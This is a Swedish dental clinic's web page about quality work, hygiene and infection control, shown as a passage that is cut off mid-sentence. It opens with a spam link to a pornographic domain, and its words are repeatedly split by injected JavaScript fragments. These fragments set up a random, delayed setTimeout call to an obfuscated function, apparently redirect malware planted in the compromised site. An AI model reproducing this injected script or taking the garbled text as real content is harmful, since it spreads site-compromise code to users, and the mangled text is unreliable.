Check Out Your URL yespornplease.vg

Kvalitetsarbete


Ett genomtänkt kvalitetsarbete
Råckstatandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andvården följer eller överträffar de lagar, förordningar och rekommendationer som finns för tandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andvårdsverksamhet i Sverige.

 

Hygien och smittskydd
Inom tandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andvården är det mycket viktigt att hålla en hög standom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andard och kvalitet inom området hygien och smittskydd. Vi har därför en kontinuerlig kontroll av alla processer som har betydelse inom området.

Våra rutiner är dokumenterade och uppfyller eller överträffar myndigheternas krav på hygien och smittskydd.

Mål
Genom rutiner och kontroller ser vi till att bästa möjliga smittskydd uppnås.
Det innebär att vi:

  • Förhindrar att smitta förs från patient till patient, från patient till personal eller från personal till patient.
  • Förebygger infektiösa komplikationer i samb